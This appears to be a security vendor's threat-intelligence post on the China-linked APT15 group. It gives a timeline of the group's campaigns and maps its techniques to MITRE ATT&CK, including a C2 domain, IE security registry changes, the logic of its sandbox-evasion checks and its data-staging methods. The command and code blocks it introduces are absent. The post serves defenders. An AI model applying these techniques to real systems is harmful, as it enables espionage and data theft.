APT15 Cyber Espionage: Campaigns and TTPs Analysis

APT15, a cyber espionage group believed to be operating out of China, has demonstrated a persistent and evolving threat capability since becoming active around 2010. The group has orchestrated numerous high-profile campaigns, starting with the "moviestar" operation targeting European Ministries of Foreign Affairs in 2013 and surveillance activities against the Uyghur ethnic minority in 2015. Their operations expanded significantly over the years, including the 2016 targeting of Indian embassy personnel, the 2017 compromise of a UK government service provider, and the 2018 hack of a US Navy contractor. Despite a major disruption by Microsoft in 2021, the group remained active, deploying new backdoors like Graphican in 2022 and utilizing the ORB3 network in 2023 to conduct reconnaissance and exploitation against targets in North America, Europe, and the Middle East.

Technically, APT15 employs a wide range of sophisticated tactics, techniques, and procedures to infiltrate and maintain access to victim networks. The group typically gains initial access through spear phishing emails with weaponized attachments or by exploiting vulnerabilities in public-facing applications such as Microsoft Exchange and VPN appliances. Post compromise, they leverage valid accounts and legitimate system tools like Windows Command Shell for execution, while establishing persistence through registry modifications, scheduled tasks, and shortcut manipulation. Their tradecraft is characterized by advanced defense evasion methods, including steganography to hide payloads in PNG images, masquerading malware as legitimate software, and utilizing complex C2 communication channels hidden within HTTP headers or DNS traffic to facilitate the exfiltration of sensitive data.

In this post, we will examine the major historical operations of APT15, detail their significant campaigns against government and diplomatic sectors, and analyze the group's tactics, techniques, and procedures to expose their operational methods. In the end, we will show how Picus Platform helps defend against this group.

Simulate APT Attacks with 14-Day Free Trial of Picus Platform

What Are the Major Activities of the APT15 Group?

2010 – The group is believed to have become active [1].

1 March – 22 March 2012 – A grouping of malicious samples, later identified as BS2005 (a malware family used by the group), was active during this period [2].

August 2013 – Specific Syria-themed attacks against Ministries of Foreign Affairs (MFAs) in Europe began; the group, operating out of China, used the "moviestar" codename for this campaign, which preceded a G20 meeting in Russia focused on the Syrian crisis [1].

2015 – The group was active targeting the Uyghur ethnic minority using Android surveillanceware families such as SilkBean, DoubleAgent, CarbonSteal, and GoldenEagle [1].

28 January 2015 – A Ketrican backdoor sample was compiled or active, part of a campaign that ESET later identified as having a particular interest in Slovakia, coinciding with potential investments by a Chinese steel giant [3].

May 2016 – Palo Alto Networks discovered the TidePool malware family (an evolution of BS2005) being used in an ongoing campaign against Indian embassy personnel worldwide [2].

May 2017 – The group compromised a company providing services to the UK Government, stealing sensitive documents related to military technology and government departments; during this incident, the group deployed new backdoors known as RoyalCli and RoyalDNS [4].

June 2018 – Intezer detected MirageFox, an upgraded version of the Mirage RAT, following the hack of a US Navy contractor [5].

July 2019 – Reports emerged of a hacking campaign targeting diplomats in Slovakia, Belgium, Brazil, Chile, and Guatemala, utilizing the Okrum backdoor and steganography to hide payloads within PNG images [3].

December 2021 – Microsoft announced the successful seizure of websites operated by NICKEL, disrupting attacks targeting organizations in 29 countries after obtaining a court order from the U.S. District Court [6].

Late 2022 – Symantec reported the group (tracked as Flea) using a new backdoor named Graphican to target foreign ministries, using Microsoft Graph API for command and control [7].

2023 – The group was observed utilizing ORB3 (SPACEHOP), a provisioned operational relay box network, to facilitate reconnaissance and vulnerability exploitation against targets in North America, Europe, and the Middle East [8].

Which MITRE ATT&CK Techniques Are Used by APT15?

The following section provides an in-depth breakdown of the TTPs linked to APT15, consolidating intelligence findings from multiple distinct operations [9] [2] [6].

Tactic: Resource Development

T1583.001 Acquire Infrastructure: Domains

To facilitate Command and Control (C2) communications, specific infrastructure is procured. In documented operations, the domain goback.strangled[.]net was identified as a C2 server utilized to manage infected systems.

Tactic: Initial Access

T1078 Valid Accounts

Following a successful intrusion, legitimate user credentials are frequently harvested via credential dumpers or stealers. These compromised credentials are subsequently employed to access victim accounts, including Microsoft 365 environments, through browser-based sign-ins or commercial VPN providers.

T1190 Exploit Public-Facing Application

Initial access is often achieved by targeting internet-facing web applications residing on unpatched systems. Vulnerabilities in Microsoft Exchange and SharePoint are frequent targets. Furthermore, unpatched remote access infrastructure, such as Pulse Secure VPN appliances, susceptible to specific exploits, has been targeted to compromise networks.

T1566.001 Phishing: Spearphishing Attachment

Spear phishing emails are disseminated to gain entry into target networks. These emails often contain weaponized attachments packaged as MHTML documents, which are designed to open in Microsoft Word by default. To enhance credibility and induce the recipient to execute the file, sender addresses are spoofed to mimic real individuals associated with relevant organizations, such as Indian embassies.

Tactic: Execution

T1059.003 Command and Scripting Interpreter: Windows Command Shell

The Windows command shell is utilized to execute commands essential for data staging and collection. For example, the xcopy utility is deployed to transfer files to temporary directories for aggregation.

The following command illustrates this activity:

T1559.001 Inter-Process Communication: Component Object Model

Malware families attributed to this group, such as Leeson, Neoichor, and NumbIdea, leverage the Internet Explorer (IE) Component Object Model (COM) interface. This interface is used to establish network connections and retrieve instructions from C2 servers.

Tactic: Persistence

T1547.009 Boot or Logon Autostart Execution: Shortcut Modification

Persistence mechanisms include the creation of .lnk shortcut files within the Startup folder that reference the malicious payload. An installer component manages this process, accepting specific command-line arguments to define the persistence method.

The arguments used are as follows:

T1053 Scheduled Task/Job

The installer component is also capable of generating hidden scheduled tasks. Specified by the tn argument, these tasks are configured to execute the malicious binary defined by fp upon every user logon. This technique relies on COM interfaces such as ITaskScheduler and ITaskService.

T1547.014 Boot or Logon Autostart Execution: Active Setup

To ensure malware execution persists across reboots, the Active Setup registry key is utilized. This configuration forces the malware to launch automatically during the boot process using specific parameters.

The command employed for this purpose is:

Tactic: Privilege Escalation

T1134 Access Token Manipulation

To elevate privileges to an administrator level, the backdoor attributed to APT15 attempts to impersonate the security context of a currently logged-on user. This is achieved by invoking the ImpersonateLoggedOnUser API.

Tactic: Defense Evasion

T1027 Obfuscated Files or Information

Payloads and network communications are frequently obfuscated to bypass detection. Backdoors have been observed embedded within valid PNG files using steganography. Loaders scan for a specific file structure containing a PNG signature and a malformed zTXt chunk where the payload is concealed.

The structure searched for is defined by these bytes:

The payload is decrypted utilizing the Tiny Encryption Algorithm (TEA) with the following hardcoded key:

In earlier iterations, the encrypted backdoor was appended to the end of a DLL and protected via RC4 encryption using keys such as:

Furthermore, C2 servers may return web pages that appear legitimate and contain strings like !DOCTYPE html. The malware parses these pages to extract and decode a Base64-encoded shellcode blob.

T1036 Masquerading

To evade detection during the data staging process, archiving utilities are often renamed. Tools such as rar.exe and 7z.exe have been observed operating under the filename wp.exe.

T1036.005 Masquerading: Match Legitimate Name or Location 

Malicious services are configured to mimic legitimate system components. For instance, the service NtmSsvc is assigned the display name "Removable Storage" to blend in with the legitimate Removable Storage Manager.

Malware is frequently dropped into file paths belonging to existing, legitimate software. Files are created to appear as components of applications like Realtek, Foxit Reader, or Adobe Flash Player.

Observed paths include:

T1112 Modify Registry

APT15 malware modifies several registry keys to disable security features and establish persistence. Specifically, keys related to Internet Explorer settings are altered.

The following code routine was observed performing these registry modifications, including setting the IEHarden value to 0:

The specific registry keys modified include:

• HKCU\Software\Microsoft\Internet Explorer\Main\Check_Associations
• HKCU\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize
• HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IEharden

T1218.011 System Binary Proxy Execution: Rundll32

Execution of the malware is often facilitated by rundll32.exe, which is used to load malicious Dynamic Link Libraries (DLLs) such as mshtml.dll.

T1497 Virtualization/Sandbox Evasion

Malware loaders employ multiple heuristics to determine if they are executing within an emulated environment or sandbox. If the checks fail, the malware terminates.

These checks include:

• Time acceleration check: GetTickCount is called, followed by a 20-second sleep, and then called again. If the time difference is insufficient, execution stops.

• Cursor position check: GetCursorPos is checked twice. A change in the X-axis position, suggesting random generation, triggers termination.

• Memory check: GlobalMemoryStatusEx is called to verify physical memory. Execution halts if memory is less than 1.5 GB.

• User interaction check: Payload execution is paused until the left mouse button has been clicked at least three times, verified via GetAsyncKeyState.

The logic for these checks is represented in the following code structure:

Tactic: Credential Access

T1056 Input Capture

Keylogging capabilities are deployed to capture user keystrokes. This is specifically accomplished using a tool named csrss.exe.

Tactic: Discovery

T1082 System Information Discovery

An APT15 backdoor automatically harvests system details, including the operating system version, build number, architecture, and computer name.

T1083 File and Directory Discovery

Information regarding connected drives is enumerated using the Drives.exe utility (DriveLetterView). Additionally, the malware performs recursive searches for specific files located within C:\program files.

Tactic: Collection

T1005 Data from Local System

Data collection involves regularly searching for and copying files from directories such as Desktop, Documents, and Downloads. This activity typically targets files that have been created or modified since the previous collection cycle.

T1074.001 Data Staged: Local Data Staging

Collected files are aggregated into a central directory, such as c:\windows\temp\wmi\, in preparation for compression and exfiltration.

T1114.002 Email Collection: Remote Email Collection

Compromised credentials are used to access Microsoft 365 accounts via the legacy Exchange Web Services (EWS) protocol, allowing for the review and collection of victim emails.

Tactic: Command and Control

T1001 Data Obfuscation

Network traffic is concealed within HTTP headers. Client-to-server data is often transmitted in the Cookie header, while server-to-client commands are embedded in the Set-Cookie header.

An example of the client request format:

The cookie data follows this parameter structure:

T1071 Application Layer Protocol

HTTP is the primary protocol used for C2 communication. Certain variants, such as RoyalDNS, also utilize the DNS protocol by querying TXT records to receive backdoor commands.

T1071.001 Application Layer Protocol: Web Protocols

HTTP POST requests are utilized to communicate with the C2 server, sending gathered victim information and receiving commands.

The following is a reconstruction of an HTTP POST request used for C2 communication:

Observed URL formats also include:

T1132 Data Encoding

Data transmitted to the C2 server is typically Base64 encoded. In some instances, a URL-safe Base64 encoding is implemented where + characters are replaced with *.

T1573 Encrypted Channel

Network traffic is encrypted using AES. The encryption key is either hardcoded within the malware or negotiated with the C2 server during the initial registration phase.

Tactic: Exfiltration

T1560.001 Archive Collected Data: Archive via Utility

Renamed versions of rar.exe or 7z.exe are employed to archive staged data files into formats like .rar or .7z prior to exfiltration.

Archived data is frequently secured using passwords derived from keyboard walks (e.g., 1qazxsw23edc, 4rfvbgt56yhn).

The following are examples of archiving commands:

How Picus Simulates APT15 Attacks?

We also strongly suggest simulating APT15 Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for APT15:

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

What Are the Aliases of the APT15 Group?

APT15 is also known as: BRONZE DAVENPORT, BRONZE IDLEWOOD, BRONZE PALACE, G0004, Ke3Chang, Lurid, Metushy, Mirage, NICKEL, Nylon Typhoon, Playful Dragon, Red Vulture, Royal APT, Social Network Team, VIXEN PANDA, Mirage, Vixen Panda, GREF, Playful Dragon, RoyalAPT, NICKEL, Nylon Typhoon, Bronze Palace, Bronze Davenport, Bronze Idlewood, CTG-9246, BackdoorDiplomacy, Playful Taurus, Flea, Red Vulture.

Key Takeaways

• Persistent Global Operations: Active since 2010 and believed to be based in China, APT15 persistently targets government, diplomatic, and military sectors across North America, Europe, and the Middle East.
• Rapid Adaptation: The group remains resilient despite disruptions, evidenced by their deployment of the Graphican backdoor and ORB3 network following a major 2021 infrastructure seizure.
• Exploitation of Public Interfaces: Attackers typically gain entry through spear phishing emails or by exploiting unpatched vulnerabilities in public-facing applications like Microsoft Exchange and Pulse Secure.
• Advanced Evasion Tradecraft: Strategies to avoid detection include steganography to conceal malicious code within PNG images and masquerading malware as legitimate software components.
• Stealthy Network Communications: Command and Control traffic is obfuscated by hiding data within standard HTTP headers, cookies, DNS queries, or by using the Microsoft Graph API.